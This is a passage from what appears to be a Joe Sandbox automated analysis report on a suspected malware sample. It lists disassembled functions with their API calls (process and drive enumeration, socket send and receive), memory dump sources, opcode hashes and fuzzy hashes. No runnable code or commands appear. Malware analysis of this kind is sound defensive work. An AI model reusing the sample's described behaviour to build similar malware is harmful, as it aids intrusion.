                                                            • Instruction Fuzzy Hash: 954181EB14C3217DB282A2A17B58FFB6B6EE6D2770731A436F507D1542E2880E4A50B1
                                                            Function 06E40257 Relevance: 1.7, APIs: 1, Instructions: 224COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 4cbbdeebc8ffd55a7e341c892ab551858fac9e6f378b920fb9a66d7fa25d65d5
                                                            • Instruction ID: 9aa74ac6b5644ea2740d3044a73605e197e7ac134fca15e50db8eb861ec49402
                                                            • Opcode Fuzzy Hash: 4cbbdeebc8ffd55a7e341c892ab551858fac9e6f378b920fb9a66d7fa25d65d5
                                                            • Instruction Fuzzy Hash: 8E418FEB14C3217DB282A2A17B58FFB6B6EE6D2770731943AF503C5542E2880E4E50B1
                                                            Function 06E40275 Relevance: 1.7, APIs: 1, Instructions: 222COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2d4ffbd664acc66c9e826faf6f9bb47972930269079b761003f3a70b857c0df7
                                                            • Instruction ID: 179a41e8c7c098a608ab48bd95f53d00b71d90a40cc878f2ab201bd30c2f8285
                                                            • Opcode Fuzzy Hash: 2d4ffbd664acc66c9e826faf6f9bb47972930269079b761003f3a70b857c0df7
                                                            • Instruction Fuzzy Hash: 4F4183EB14C3217DB282A2A13F58FFB6B6EE6D27707319436F503C5542E2880E4E50B1
                                                            Function 06E40288 Relevance: 1.7, APIs: 1, Instructions: 215COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 14a3dc3b63b02a0a7ad715b8fa2447f844bfe51ec04cc7563d123daaabe28828
                                                            • Instruction ID: 514433c65d340c6cd6354c4489a70091ac5ad4371965f4b1acfa747dc04a4e66
                                                            • Opcode Fuzzy Hash: 14a3dc3b63b02a0a7ad715b8fa2447f844bfe51ec04cc7563d123daaabe28828
                                                            • Instruction Fuzzy Hash: E54161EB14C2217DB282A6A17F58FFB6B6EE6D27707319436F503D5542E2880F4E10B1
                                                            Function 06E402A2 Relevance: 1.7, APIs: 1, Instructions: 208COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 57fa9bd90f1079f9a599efe25ea2e08954628e6cc6922b16ea624603e21d6cbb
                                                            • Instruction ID: 2898ebe77eb7acd262cf227b62f975cd894e4f55c9125e60ff9525eb54bc3597
                                                            • Opcode Fuzzy Hash: 57fa9bd90f1079f9a599efe25ea2e08954628e6cc6922b16ea624603e21d6cbb
                                                            • Instruction Fuzzy Hash: 503150EB14C2217DB282A6A17F58FFB6B6EE6D2770731A436F507D5542E2880E4E10B1
                                                            Function 06E402C1 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: d08c094738e6c093b57aba50160da61f8f002c10acbbf63cd8b57dca693786e6
                                                            • Instruction ID: aa655449cfc8a58ddf4c3168733e0f2049cd274033b06cfaa6088b42e195590d
                                                            • Opcode Fuzzy Hash: d08c094738e6c093b57aba50160da61f8f002c10acbbf63cd8b57dca693786e6
                                                            • Instruction Fuzzy Hash: 0A3182EB14C2217DB282A6A17F58FFB6B6EE6D27707319436F503D1542E3880E4E50B1
                                                            Function 06E402E4 Relevance: 1.7, APIs: 1, Instructions: 192COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 342244f317da9724519d714e00a10461091ed292a24fafd6dc79a834c0236c19
                                                            • Instruction ID: 5aac26c0b565bcefd4d02e51c86d98a2226f2b5fe8a042344db777bbf65ec73c
                                                            • Opcode Fuzzy Hash: 342244f317da9724519d714e00a10461091ed292a24fafd6dc79a834c0236c19
                                                            • Instruction Fuzzy Hash: B231D6EB14C3107DB282A6A17B58FFA6B6EE6D2770731943AF503C5502E3880E4E51B1
                                                            Function 01044950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • gethostname.WS2_32(00000000,00000040), ref: 01044AA5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: gethostname
                                                            • String ID:
                                                            • API String ID: 144339138-0
                                                            • Opcode ID: 7c9484a6e5b82ad3a797b0675a9887948e42f7d1316c600adfefdb963751ce58
                                                            • Instruction ID: 7539d5c9264141afe97b579048fd40221978370177da74e9537ccd15352d5513
                                                            • Opcode Fuzzy Hash: 7c9484a6e5b82ad3a797b0675a9887948e42f7d1316c600adfefdb963751ce58
                                                            • Instruction Fuzzy Hash: F251DFF46003018BFB719A29DDC87277AD4AF01319F0408BCDACAC66D1E7B4E884DB52
                                                            Function 06E40342 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 7f2d2a458eafe206a4f3c1ea0d025a12af43e8be9132e386bf1583fd4a2e29a1
                                                            • Instruction ID: 677ccde74355a93a5e56aabdb47f5b29dca5305d4109f10567b34fb45bc3860a
                                                            • Opcode Fuzzy Hash: 7f2d2a458eafe206a4f3c1ea0d025a12af43e8be9132e386bf1583fd4a2e29a1
                                                            • Instruction Fuzzy Hash: CC2194EB14C3217DB2C2A2A17B58BFA6B6EE6D2770731E436F503D5542E3884E4A10B1
                                                            Function 06E40351 Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 52f495c8ad6d286a4f9fb04a7b280fbd17e2dc1e0a3e247a20f71a780e95cfc2
                                                            • Instruction ID: 40efd857f42aa0f2fffb98936fd115bdf48056e96626da4a2571b6395de0276e
                                                            • Opcode Fuzzy Hash: 52f495c8ad6d286a4f9fb04a7b280fbd17e2dc1e0a3e247a20f71a780e95cfc2
                                                            • Instruction Fuzzy Hash: BD21A6EB14C3117DB2C2A6A17B58BFA6B6EE6E6770731E537F503D1541E2880E4B10B1
                                                            Function 06E40378 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 061af963433f4dde933a91a3d2e4ae0eb9a43feb166d683c91a38402ba9756f7
                                                            • Instruction ID: f331747c63866c435f0eb68ff9344d9732e19b2c53309e6a32698f15340bba25
                                                            • Opcode Fuzzy Hash: 061af963433f4dde933a91a3d2e4ae0eb9a43feb166d683c91a38402ba9756f7
                                                            • Instruction Fuzzy Hash: 1F21C2EB14C3117D72C2B2B17B58BFA6A6EE6E33B0731A436F603D1541E2880E4B10B1
                                                            Function 06E4039C Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,06E40026), ref: 06E40487
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 929926605f0d6eaec021cc58ba9f0ce57ab3d7399947aa14345b9f0729ed0e19
                                                            • Instruction ID: a59938a8142012f3676032f544135bc79b4a0e458aee8c4d5301fb5f2aa2f935
                                                            • Opcode Fuzzy Hash: 929926605f0d6eaec021cc58ba9f0ce57ab3d7399947aa14345b9f0729ed0e19
                                                            • Instruction Fuzzy Hash: F22124EA14C3513DB382B3B17A596F57E5EE6E72B0331A536E643C5102E2880E4B51B2
                                                            Function 06E403D2 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 1b4c567195d0124328b88f68e3a697556cc928ed1a67a8ae20d17a11cbf8fe0d
                                                            • Instruction ID: 63458b5d4aa2acd3b2fed4cc95e96a52a1e07eaf773ae83875c8f09aacc15dc2
                                                            • Opcode Fuzzy Hash: 1b4c567195d0124328b88f68e3a697556cc928ed1a67a8ae20d17a11cbf8fe0d
                                                            • Instruction Fuzzy Hash: D311E9DA14C3113DB3D6A6B07A186F66A5EE3E32B0732A536B543D5541E2894F4B10F1
                                                            Function 06E40408 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 6c52f3174018f5061aaec9e8fb1e51d8987e3e2bf0fec02497a6ef0adef308a5
                                                            • Instruction ID: 8584056c43c4a49575b640aabc32c123f556fc5c4bc95805c767aee9ffb11f66
                                                            • Opcode Fuzzy Hash: 6c52f3174018f5061aaec9e8fb1e51d8987e3e2bf0fec02497a6ef0adef308a5
                                                            • Instruction Fuzzy Hash: E61129DA24C3113DB282B670BE18BF66A6ED2E22B0731A532F542D5441E2884E4B40F0
                                                            Function 06E403FE Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: ca3f5d259a12c7e526670f953e3e1d13596609d15db4823570005d1de75a2d92
                                                            • Instruction ID: 17f8b676b4485616fec2a4f57e329db596e69c39d41681d673cebab7c3a66ee1
                                                            • Opcode Fuzzy Hash: ca3f5d259a12c7e526670f953e3e1d13596609d15db4823570005d1de75a2d92
                                                            • Instruction Fuzzy Hash: FC0188DA14C3117DB286B6B17B18AF6662ED6E32B1731A536F603D5541E2884E4B10F1
                                                            Function 06E40429 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,06E40026), ref: 06E40487
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: c2a8c8fc3dd26352668ef6a28e5bf3fa6d81eeaffcfbce5175612519fe69610c
                                                            • Instruction ID: 04fc2ca4c7d8e08ea95146a9bdf11d63cce33b83191a7df0d00bde515a39469d
                                                            • Opcode Fuzzy Hash: c2a8c8fc3dd26352668ef6a28e5bf3fa6d81eeaffcfbce5175612519fe69610c
                                                            • Instruction Fuzzy Hash: 47018FEA14C2117DB292A2A17F18BF6662EE2E33B0731A532F603D5581E2884E4B10B1
                                                            Function 06E4043D Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(?,06E40026), ref: 06E40487
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 8f5230c5f820b8575a373a5ae90bdd4ffd3057a82a8b52ac663120507e523616
                                                            • Instruction ID: 3cc33816395d25954bb9c302c9ab75789cee2cd24ff25fa3d3ce77b5c062fe31
                                                            • Opcode Fuzzy Hash: 8f5230c5f820b8575a373a5ae90bdd4ffd3057a82a8b52ac663120507e523616
                                                            • Instruction Fuzzy Hash: F90128AA24C3103DF392A6B17B08BFA662DE6D36717319436F503C1442E2884A4F10F1
                                                            Function 06E00347 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E0033D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175554813.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID:
                                                            • API String ID: 999431828-0
                                                            • Opcode ID: 55e2523bf4338a48043932cf938ef43e339a9f53e567f53b0afba940db16afaf
                                                            • Instruction ID: e235d84e9ed2df7796889a3398c67e289b2b460e4818b1b18c65d1b55042d0cd
                                                            • Opcode Fuzzy Hash: 55e2523bf4338a48043932cf938ef43e339a9f53e567f53b0afba940db16afaf
                                                            • Instruction Fuzzy Hash: CC114C9690C351AFF78389E04588FFA3F69E95F1703346466E142C9482F5AD0AC787A1
                                                            Function 06E00322 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E0033D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175554813.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID:
                                                            • API String ID: 999431828-0
                                                            • Opcode ID: 814324704ea17565c0717f773c33ed571608de376011df056dc607adf6d355fa
                                                            • Instruction ID: 781130761ef0b6a9e1a4b45dbc57ec00597569c477b538654a7f5ebeff1a64ee
                                                            • Opcode Fuzzy Hash: 814324704ea17565c0717f773c33ed571608de376011df056dc607adf6d355fa
                                                            • Instruction Fuzzy Hash: E0F0C892A0C351BFF7C385910A88FFB7B39BA9E2303205462F103951C1F9A84BC656A1
                                                            Function 0105AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • getsockname.WS2_32(?,?,00000080), ref: 0105AFD1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID:
                                                            • API String ID: 3358416759-0
                                                            • Opcode ID: 499d9f57557bc89fa777aba1386099c8827530b0eaf7c6292d45b5d236dd0e1d
                                                            • Instruction ID: 5f8603de02e1e866abb8363da601d9d9c95e96aa6d232cda024cffc9cc9c2f36
                                                            • Opcode Fuzzy Hash: 499d9f57557bc89fa777aba1386099c8827530b0eaf7c6292d45b5d236dd0e1d
                                                            • Instruction Fuzzy Hash: 8E118470908785D5EB668F5CD8027E7B3F4EFC0329F109A18E9D942150F73696C58BD2
                                                            Function 06E00334 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E0033D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175554813.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID:
                                                            • API String ID: 999431828-0
                                                            • Opcode ID: a7ac1152e4a71cd6be156d85dffd07a52447eff7de64d9b334870440ec4edaaa
                                                            • Instruction ID: 2b8c1a52a0b24cda93a202c4cfbb718ecbcbd3d1620d0fffc0ac65c00b263557
                                                            • Opcode Fuzzy Hash: a7ac1152e4a71cd6be156d85dffd07a52447eff7de64d9b334870440ec4edaaa
                                                            • Instruction Fuzzy Hash: EBF0F6D2A0C345BFB7C385910688FFA2B69B5DE220330A066B1029A581F9A84EC646A1
                                                            Function 0105A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0105A97E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: send
                                                            • String ID:
                                                            • API String ID: 2809346765-0
                                                            • Opcode ID: 207faae2d5caf89190804ee59e8d8dd42862da466406eba0f8db356adb04b4e1
                                                            • Instruction ID: bfeb78bd8dbaf3bb538cee970e00128fa1815778c2704ef4d920100214762a5b
                                                            • Opcode Fuzzy Hash: 207faae2d5caf89190804ee59e8d8dd42862da466406eba0f8db356adb04b4e1
                                                            • Instruction Fuzzy Hash: B901A276B01710AFD7548F28DC45B5ABBA5EF84720F068659EAD82B361C331AC108BE1
                                                            Function 0105A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0104712E,?,?,?,00001001,00000000), ref: 0105A90D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: recvfrom
                                                            • String ID:
                                                            • API String ID: 846543921-0
                                                            • Opcode ID: 7617b798a74a77bdd555b5cf34c0ac127c87266604719a39b57b7d4420d021c7
